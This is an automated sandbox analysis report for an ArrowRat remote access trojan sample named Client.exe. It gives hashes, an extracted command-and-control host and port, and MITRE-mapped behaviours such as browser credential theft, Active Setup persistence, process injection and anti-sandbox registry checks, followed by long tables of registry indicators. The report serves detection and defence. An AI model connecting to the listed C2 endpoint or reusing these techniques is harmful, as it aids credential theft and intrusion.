arrowrat | 13331184c24e8d70fedbaaa6b78f186f5205dc7be568b22dc0f802de74cb0749

Analysis

max time kernel
136s
max time network
138s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
31-07-2024 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

158KB
MD5

af3110c5a76b0417ccc3abb03304c739
SHA1

502ed23efa3bdc400d38c4bc1b1a823087b463a4
SHA256

13331184c24e8d70fedbaaa6b78f186f5205dc7be568b22dc0f802de74cb0749
SHA512

8ba8f64f0681c721fa3540d68308ab1d0dc8e5e276f274b02c7833e4a91e0aea8507e3f35b57cc8093c35ae318652a2a64380fac8e0355afc3d44286c57f43e7
SSDEEP

3072:5bzwH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP1OO8Y:5bzwe0ODhTEPgnjuIJzo+PPcfP1B8

Score

10^/10

arrowrat client credential_access discovery persistence rat stealer

Malware Config

Extracted

Family

arrowrat

Botnet

Client

and-statements.gl.at.ply.gg:43442

Mutex

gvwEQrvlK

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Client.exe

description	pid	Process	procid_target
PID 3080 set thread context of 756	3080	Client.exe	74

Drops file in Windows directory 3 IoCs

Processes:

explorer.exeSearchUI.exe

description	ioc	Process
File created	C:\Windows\rescache\_merged\2717123927\1590785016.pri	explorer.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\4032412167\4002656488.pri	explorer.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.execmd.exetaskkill.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchUI.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
5140	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

SearchUI.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\GPU	SearchUI.exe

Modifies registry class 30 IoCs

Processes:

SearchUI.exeexplorer.exefirefox.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133567065728993929"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fcc000000000000002000000e80707004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000002885a98770e3da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80707004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c0000000000000000000000007500438770e3da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e80704004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc7600000000000000000000000021f776218a86da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

Client.exe

pid	Process
3080	Client.exe
3080	Client.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

Client.exeexplorer.exefirefox.exetaskkill.exe

description	pid	Process
Token: SeDebugPrivilege	3080	Client.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeDebugPrivilege	1640	firefox.exe
Token: SeDebugPrivilege	1640	firefox.exe
Token: SeDebugPrivilege	5140	taskkill.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe
